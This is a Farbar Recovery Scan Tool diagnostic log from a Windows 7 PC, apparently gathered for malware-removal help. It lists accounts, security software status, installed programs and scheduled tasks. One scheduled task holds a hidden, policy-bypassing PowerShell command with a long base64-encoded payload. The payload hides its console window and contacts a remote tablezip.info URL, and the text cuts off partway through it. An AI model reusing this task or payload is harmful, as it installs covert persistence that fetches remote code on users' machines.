﻿Additional scan result of Farbar Recovery Scan Tool (x64) Version:17-02-2016
Ran by User007 (2016-02-19 18:23:50)
Running from C:\Users\User007\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2012-02-28 08:52:12)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-933345331-3392081266-2507309670-500 - Administrator - Disabled)
Guest (S-1-5-21-933345331-3392081266-2507309670-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-933345331-3392081266-2507309670-1004 - Limited - Enabled)
User007 (S-1-5-21-933345331-3392081266-2507309670-1000 - Administrator - Enabled) => C:\Users\User007

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: avast! Antivirus (Disabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Disabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

@BIOS (HKLM-x32\...\{B2DC3F08-2EB2-49A5-AA24-15DFC8B1CB83}) (Version: 2.12 - GIGABYTE)
µTorrent (HKU\S-1-5-21-933345331-3392081266-2507309670-1000\...\uTorrent) (Version: 3.4.2.31893 - BitTorrent Inc.)
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe Flash Player 20 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Adobe Flash Player 20 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 20.0.0.306 - Adobe Systems Incorporated)
Adobe Media Player (HKLM-x32\...\com.adobe.amp.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.8 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.13) - Czech (HKLM-x32\...\{AC76BA86-7AD7-1029-7B44-AB0000000001}) (Version: 11.0.13 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.9.160 - Adobe Systems, Inc.)
Advanced SystemCare 9 (HKLM-x32\...\Advanced SystemCare_is1) (Version: 9.0.3 - IObit)
AMIP (remove only) (HKLM-x32\...\AMIP) (Version:  - )
Assassins Creed II version 1.0.0 (HKLM-x32\...\Assassins Creed II_is1) (Version: 1.0.0 - Ubisoft)
Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 11.1.2245 - AVAST Software)
Balíček ovladače systému Windows - Nokia pccsmcfd LegacyDriver  (05/31/2012 7.1.2.0) (HKLM\...\62BBD193ADFDBB228C7E1ADB56463F5732FF7F6F) (Version: 05/31/2012 7.1.2.0 - Nokia)
BlueStacks App Player (HKLM-x32\...\BlueStacks App Player) (Version: 0.9.30.9239 - BlueStack Systems, Inc.)
BlueStacks Notification Center (HKLM-x32\...\{3792811C-832F-4392-B44A-24092901EDDC}) (Version: 0.9.30.9239 - BlueStack Systems, Inc.)
Call of Duty(R) 2 (HKLM-x32\...\InstallShield_{D0A05794-48C2-4424-A15A-9F20FCFDD374}) (Version: 1.3 - )
Call of Duty(R) 2 (x32 Version: 1.00.0000 - ) Hidden
Call of Duty(R) 2 Patch 1.3 (x32 Version: 1.3 - ) Hidden
Cisco AnyConnect VPN Client (HKLM-x32\...\{F4C6DD02-8ACA-4354-BA36-9FFC3B767E73}) (Version: 2.5.2014 - Cisco Systems, Inc.)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.49.1.0356 - Disc Soft Ltd)
Devil May Cry 4 (HKLM-x32\...\{D4E5A687-797D-44B1-8F96-4FD7A24166A9}_is1) (Version: 1.1.0.0 - R.G. Revenants)
Dota 2 (HKLM-x32\...\Steam App 570) (Version:  - Valve)
Dragon's Dogma: Dark Arisen (HKLM-x32\...\Dragon's Dogma: Dark Arisen_is1) (Version:  - )
erLT (x32 Version: 1.20.0137 - Logitech, Inc.) Hidden
Etron USB3.0 Host Controller (HKLM-x32\...\InstallShield_{DFBB738C-71D8-4DC5-B8D2-D65C37680E27}) (Version: 0.105 - Etron Technology)
Etron USB3.0 Host Controller (x32 Version: 0.105 - Etron Technology) Hidden
Extended Asian Language font pack for Adobe Reader XI (HKLM-x32\...\{AC76BA86-7AD7-2530-0000-A00000000049}) (Version: 11.0.09 - Adobe Systems Incorporated)
FFsplit (HKLM-x32\...\{0CC02290-DC3A-4768-8221-5503EC80FBFC}) (Version: 0.4.2 - FFsplit)
Fraps (HKLM-x32\...\Fraps) (Version:  - )
Gameforge Live 2.0.8 (HKLM-x32\...\{9C98989A-3A15-42DA-A3B9-D20331437D67}}_is1) (Version: 2.0.8 - Gameforge)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.109 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.5 - Google Inc.) Hidden
Grand Theft Auto V version v.1.0.350.1 (HKLM-x32\...\Grand Theft Auto V_is1) (Version: v.1.0.350.1 - GMT-MAX.ORG)
Hell Yeah! (HKLM-x32\...\Steam App 205230) (Version:  - Arkedo)
Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.6.0.1002 - Intel Corporation)
Intel(R) Solid-State Drive Toolbox (HKLM-x32\...\Intel(R) Solid-State Drive Toolbox) (Version: 3.0.3.400 - Intel Corporation)
IObit Uninstaller (HKLM-x32\...\IObitUninstall) (Version: 5.1.0.20 - IObit)
Jade Empire (HKLM-x32\...\{EEAA7AC3-F651-4842-86E0-4C755181388B}) (Version: 1.0.1.1 - Electronic Arts)
Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation)
Jet Set Radio (HKLM-x32\...\Steam App 205950) (Version:  - Blit Software)
K-Lite Codec Pack 11.5.5 Full (HKLM-x32\...\KLiteCodecPack_is1) (Version: 11.5.5 - )
KMPlayer (remove only) (HKLM-x32\...\The KMPlayer) (Version: 4.0.3.1 - PandoraTV)
Lara Croft and the Temple of Osiris (HKLM-x32\...\Lara Croft and the Temple of Osiris_is1) (Version:  - )
Logitech Gaming Software 8.53 (HKLM\...\Logitech Gaming Software) (Version: 8.53.154 - Logitech Inc.)
Lyrics Plugin for Winamp (HKLM-x32\...\{75E9A522-65D2-4200-A95F-C3EF89703263}) (Version: 0.4 - Lyrics Plugin)
Manga Reader v1.5.6 (HKLM-x32\...\{E6FE6139-8678-4DE9-9E76-0279B258BE35}) (Version: 1.5.6 - Manga Reader)
Mark of the Ninja (HKLM-x32\...\Steam App 214560) (Version:  - Klei Entertainment)
Marvell Storage Utility V4 (HKLM-x32\...\mvMSU) (Version: 4.1.0.1921 - Marvell)
Microsoft .NET Framework 4.5.1 (čeština) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1029) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 16.0.6366.2036 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-933345331-3392081266-2507309670-1000\...\OneDriveSetup.exe) (Version: 17.3.4604.0120 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
mIRC (HKLM-x32\...\mIRC) (Version: 7.41 - mIRC Co. Ltd.)
Mozilla Firefox 37.0.1 (x86 cs) (HKLM-x32\...\Mozilla Firefox 37.0.1 (x86 cs)) (Version: 37.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 30.0 - Mozilla)
MSI Afterburner 4.1.1 (HKLM-x32\...\Afterburner) (Version: 4.1.1 - MSI Co., LTD)
MSVC80_x64_v2 (Version: 1.0.3.0 - Nokia) Hidden
MSVC80_x86_v2 (x32 Version: 1.0.3.0 - Nokia) Hidden
MSVC90_x64 (Version: 1.0.1.2 - Nokia) Hidden
MSVC90_x86 (x32 Version: 1.0.1.2 - Nokia) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML4 Parser (HKLM-x32\...\{01501EBA-EC35-4F9F-8889-3BE346E5DA13}) (Version: 1.0.0 - Microsoft Game Studios)
MyDriveConnect 4.0.7.2442 (HKLM-x32\...\MyDriveConnect) (Version: 4.0.7.2442 - TomTom)
Nero 7 Ultra Edition (HKLM-x32\...\{91C0B95B-B83A-4828-A775-BBE2DD421029}) (Version: 7.02.9752 - Nero AG)
NetBalancer (HKLM\...\NetBalancer_is1) (Version:  - SeriousBit)
NVIDIA Ovladač HD audia 1.3.34.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.4 - NVIDIA Corporation)
NVIDIA Ovladače grafiky 359.06 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 359.06 - NVIDIA Corporation)
NVIDIA Systémový software PhysX 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
Office 16 Click-to-Run Extensibility Component (Version: 16.0.6326.1010 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.6326.1010 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (Version: 16.0.6326.1010 - Microsoft Corporation) Hidden
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Opera 12.16 (HKLM-x32\...\Opera 12.16.1860) (Version: 12.16.1860 - Opera Software ASA)
Opera Stable 35.0.2066.68 (HKLM-x32\...\Opera 35.0.2066.68) (Version: 35.0.2066.68 - Opera Software)
Origin (HKLM-x32\...\Origin) (Version: 9.11.2.10120 - Electronic Arts, Inc.)
Ovládací panel NVIDIA 359.06 (Version: 359.06 - NVIDIA Corporation) Hidden
Path of Exile (HKLM-x32\...\Steam App 238960) (Version:  - Grinding Gear Games)
PC Connectivity Solution (HKLM-x32\...\{BA77F9D2-CD35-41EB-9BC9-769879DFF8A6}) (Version: 12.0.48.0 - Nokia)
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9.140.248 - Google, Inc.)
RaidCall (HKLM-x32\...\RaidCall) (Version: 7.3.6-1.0.12971.93 - raidcall.com)
Rapture3D 2.4.11 Game (HKLM-x32\...\{D2FCA41E-AC01-4DCD-B3A7-DC9E32363065}}_is1) (Version:  - Blue Ripple Sound)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.48.823.2011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6433 - Realtek Semiconductor Corp.)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.6.8 - Rockstar Games)
SEGA Genesis & Mega Drive Classics (HKLM-x32\...\Steam App 34270) (Version:  - Sega)
Skype™ 7.9 (HKLM-x32\...\{6A0549A9-1B96-498C-ACBC-3943001FEB19}) (Version: 7.9.103 - Skype Technologies S.A.)
Smart Defrag 4 (HKLM-x32\...\Smart Defrag 4_is1) (Version: 4.3 - IObit)
South Park The Stick of Truth - Update 2 version 1.0.1361 (HKLM-x32\...\{43BC092F-FEEF-4E74-805A-B20A67522D10}_is1) (Version: 1.0.1361 - Ubisoft)
SpeedFan (remove only) (HKLM-x32\...\SpeedFan) (Version:  - )
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Surfing Protection (HKLM-x32\...\IObit Surfing Protection_is1) (Version: 1.3 - IObit)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.15 - TeamSpeak Systems GmbH)
TERA (HKLM-x32\...\{A2F166A0-F031-4E27-A057-C69733219434}_is1) (Version: 28 - Gameforge Productions GmbH)
The Witcher 2: Assassins of Kings Enhanced Edition (HKLM-x32\...\Steam App 20920) (Version:  - CD Projekt RED)
The Witcher 3 Wild Hunt v.1.10 (HKLM-x32\...\The Witcher 3 Wild Hunt_is1) (Version:  - )
Trine 2 (HKLM-x32\...\Trine 2_is1) (Version:  - )
Ubisoft Game Launcher (HKLM-x32\...\{888F1505-C2B3-4FDE-835D-36353EBD4754}) (Version: 1.0.0.0 - UBISOFT)
Uplay (HKLM-x32\...\Uplay) (Version: 4.9 - Ubisoft)
Visual Studio C++ 10.0 Runtime (HKLM-x32\...\{4412F224-3849-4461-A3E9-DEEF8D252790}) (Version: 10.0.0 - TomTom International B.V.)
War Thunder (HKLM-x32\...\Steam App 236390) (Version:  - Gaijin Entertainment)
Winamp (HKLM-x32\...\Winamp) (Version: 5.623  - Nullsoft, Inc)
WinRAR 4.11 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.11.0 - win.rar GmbH)
Xfire (remove only) (HKLM-x32\...\Xfire) (Version:  - )

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {2332934C-A9F7-4543-B848-EF3653CB16E2} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2015-12-29] (Microsoft Corporation)
Task: {2BAB6F67-893A-41C9-B3F5-C18E41525568} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-27] (Google Inc.)
Task: {3568D03D-F4C1-4EF5-A483-55715000F8B2} - System32\Tasks\{0F050B47-7E7E-7D09-0B11-0E0C0B7E110B} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHQAYQBiAGwAZQB6AGkAcAAuAGkAbgBmAG8ALwB1AC8APwBhAD0AWQBhAGEANABHADcANgBhAG0AbAA2AC0AagByAFoAbABnAE8AVwBxAEkASwBRADAAQgBuAEEAQQA4AHIAVwBDADUAOQA5ADAASwBRAHgAMgByAFEANwBuAFAAYwB1ADEATQBsADEAOQBvAG0AQwBCAEUANQBiAHYAQQBrAGkAVQBKAGgASwBGAHQAcwBPADUAOABBAHUAUwBDAE0AUQB3AFIAbwB3ADgAeQBvAG8ANABEAEQAMwA5AE8AVwBwAGQAeAAyAG4AdwBMAGoATQB4AGIASgBWADIAdgBhAEEAVAB0AC0AdABCAEoAawBuAGEAOABSADAAcwB1AHYASQA3AHQAMgBpAGQAeAB6ADEAcQBhAEwARQA2AG8ARgBOAEQAOQBXAEEAMgAwAHIAMwBGAFAAVAA4ADgASgBwAHMAVABDAFEAcABQAFYARwA4AEoAVwBzAGMAeQA3ADgAegBpAGYAeAB5AEwASQBfAEkAQQB1AEoASQAyAHMAXwBfAE0AdAA2AEYAMgBsAFUATABsAEMAQQB6AFoAVgBVAEwAawB2AGYAQwA0AGYASABLAFUAdwBGAGIAaABPAFMAdQB5AHkAOQBoAE4AaQBiADIAVgB5AC0AawBYAEsAeABjADUANABxAFcATwBWADUAMQB5AGQASwAzAEIAagBVAEIAZwAxAHYAaABkAHMAcgBoAEsAcQBOAFEARgBzAEcARABDAC0AVwBCAHYARQBoAFEAVQB2AHAASwBsAGEAaQBsADQARwBJAGkAZQBnAFAAagBSADIAMABRAEcAUQB1AGUARwAzAG8AcQBIAGIAUwBOADkAVwB0AHkASgBDADkAVABXAGUATgA2AFMASQB6AFoAaABBAGEAMwBhAG4AMgB1AFQAdQBlAGkAaABHAFcAeABrAHIAbAB0AE8ANABQAHQANQBzAGEAbQBNAEIAZAB1AEUANAA3AFgAUABiADcAZABPAEwAZwBPAFMASABoADkAaAAyAFEAUABnAGYAaABEAFEAUwBGAEkAVgBUAFIAYQAzAHEAegBzAHAASABaAGsAWABuAFYAWgBGADgAdgBKAEYAaABRAFYAZQBKAG4AZgA3AGQAWAB0AEcAWgBFAFAAcgBHAHUAMABHAEUAUgBOAFgARgB5ADYAeQBMADkAMAB4AFQAdgBoAG0ATwBzAFoAZABxAGMAZwBDAGcAdwBoAG8AMABpAEIAcAA5AHEARwBoAFUAcABVAHQAYwA2AFkAMABkAEgAUQA2ADQANABmAEQAbQB5AEYAegBBAFUAagBzAGYARwBMAG0AYgBFAF8AagBSAG4AbgBHAG0AZwBHAEIAMABDAEUAQQBsADYANAByAFAATwBBAHAAZwBCAFcAUQBCAHUATQBMAGgANABwAG0AagBFAFMANQBIADEALQBpAGoAdAB3AFEAbgB6AEMARQBXADMAcAB4AHAAZABaAFYAbwBiAE8ARwBqAC0AegA2AE0ASgBmAGQAcQB4AEYAOQB0AE0AUgBzAEMAUABUAGoAeQB3AGcATQBCAEUAdABEAEQAUQBWADgAWQBuAEUALQBJAC0AVgBaADkAcgBUAEQAdgA3ADUAWQBRAGYAagBBAEMAbQBxAGUAMABLADIAZABQAG8AcABvAEYARwA5AEYAdwAzAFIAMQBmAEcALQBnAHUAZwBTAEwAbAByAHIAZQB4AGoARABJAGoARQBkAGUAZwAxAFMAQwA0AEMATgBQAHYAUwA3AHMATABYAHIAdQA2AFEAVQBqAFAAdwBxAFUAUQBzAFoAUgBMADEAagBiAEoAUgBFAGwAcgA1AGMAWQA3ADUAWABxAEEAWABOAFIALQBrAEoATgB1AFQAdwBRAHMAUwBTAG8AcABlAFAAOABiAHUAMgBlADUAdQBhAHIAOABjAHoAZABaAG8AQwB5AEEAdwB1AHEASABjAHUAdwBNAHkAbQBvADcAdAB5AGoAWgBlAHkAYwBkAG0AMwBwADIAWAByADAAOABsAF8ANgBCAGoAWgB1ADYAaQBFAE0AUwBhAE8AOQB5AGUAZQBXAFkAVQBuADgAYwB2ADEANwBpAGMAQgBlAE8AMQBvAFIATQAyAHIARwB6AHEAegA2ADAAUgBYAEYAeABsAGEANwBJAC0AVgBvAHMATgBSAEEALQAxADgASAB3AHUARwB0AHEATgB6AGsARgBvADAAWABDAGcAUwBJAC0AbABGAHEAQQBxADkANQBzAGMAcAB2AHIASwB4AHUAVQB6AE0AawBlAFMANgBfAHUANgB2AC0AeQA3ADUAWQBXAC0AZAA3ADcAdgB3AF8ASQBnAHUAdQAzAFgAZgBDAHMAbwBjADIAXwBOAFEAVQBoAHIAOQBTADkAbABZACYAYwA9AFcAdwB3ADAAUwBfAGwAbABnAFYAcQBMAE8AeQBZAHkAYQBpAGsATQB3AE0AeABzAHMAWQB1AEoAVQBXAGgARQBnADEALQBDADEAMwBrAEIATQBUAEwANgA5AEoAQgBzAEUAdgAwAHoAUQBBAHoATgBCAGwAdwBzAGUAdgByADgARQBxAHIAdwBNAHAAXwBTAEgAbQBpAF8ARQA5AEoAMAA5AFYAcwBnAHMARQBkAFQAOABpAHAAWgBtAGkAaQBqAEYAawA3AEgAdgB6AFIAZgAtAGsASQBYAF8ARQBXAFkAWgBFADAAQQAyAFQAVwBpAHEAbwB4AHIAVQBLAFEAaQBSAF8AdQBRAHgAMgBKAGwASwBTAHQAMwBrAGsAYgBYAHIATQBDAGIAdgA3ADUAMwBjADIASQBDAC0AZwBuAGkAaABnAE0AdABfADYAXwBEAFcAZgAwAE8AWQBXAEcAdQBsAGwAUQA3AEEAQQB2AF8AMwA0AEQAdgBUAEwAdQBzADAAcgB4ADQAdAA0ADcAQgBuAEcAUQBCADYAagBwAG0AcwBvAHEAQwBaAGUATwBNAGcAUgA3AFYAawBrAC0AUwBsAGIAagB0AG0AdQBjAGgAOQBrAE8AbAB4AGEATQB5AHoANQBJAE8ASwA1AEIAVABvAEYAZAA5AFQAdgBnAHQARgBoADcARAA5ADAAcABLADgATABpAFQAbABGADUAVQBCAG8AZQBmAE8AVABsAG8AQgBZAEsAZgBlADEAQQAxAE4AWAB2ADQANABHAEIAUAB1AHoATABQAHQAZgBrADEAVAB0AFMARQBvAHEASABiADkAcgBYADAAbwBBAFoAcwBLAGsAdgAtAFUAaAAtAHUAcgB4AFIAcwB4AG0AUAAxAFoAeQBrAEEAZwAxAHUATwB3AFkAegByAHMASwBXAG4AZwBmAE8AZQBjAC0AaQA3AEYAMwB6AGcANwBvAG4AcQBNAHgAeABqAGMANwBTAE8AaQA1AEcAcwBTAHoARABPAG0ARAA5AHAANwB0AGoAeQBFADgARwBBAC0AbgBzAEQAMwBRAGkARwBWAE8AaABmAGkANgBTAGEARwBTAHMAQgBLAGMARABwAFQARQBkAFkAbABqAGQAOABWAGgATgAwAHYAMABQAF8AUwBnADMAYgBYAGUASQBXAEkATgAtAGYAZgBvAHAAdABuAF8AVQBaAFQATQBOAFIAWQBNAEcAOABKAFgAUgBFAEoARgAyAGUAQwBNAEwATgBFADMAOQB2AF8AdQBtADYAVgBKADYAZQByAG8ATgB4AEEAcQBJAHoAVAB4ADQAYgBHAGIAOABlAEwAcABtAGwAUgA5AFUAXwBoAGEAVgBWAGcAagBVAHoAQgBOAFEAXwBZAEUAZQBqAEEAOQBxAGgAVQAwAGsAMABuAHIAdQBhADgARQAzAFgAdgBhAFEAVABNAFMAVwA0AHoARgBkAFIASwAxAFcAZQBFADEAcgB2ADUAQgBZAEcAaABRAEQAbwBCADQATgB3ADgAVABGAGwAQwBCAGsARwBNAFUAagBnAEYAUABwAHAAMQAtAGMAWgBvAGYANgBuAFAAagB4AG4AVABaAHQAQwBNADcASgBoADUASQBsAGUATwBaAG4AbQBfAGwASABUAEIAOQBoAHgAeQB3AEkAdABWAEoAWgBCAE4AbwBTAHMATABoAGcAbwBuADIATwBxAG0AWgB4AHIAQgBVAEoAWQBDAGEAZQB0AGIAOQBEAGMASQBpAG4ARgBKADgAUAB0AHAAcABNAEoAVABTAHkAbQA1AEIAbwBiAGYAZwBVAGYAUgBLAF8AcQBPAHUASQBCAFcAaQBPAFEAeAAyAEgAaAAzAF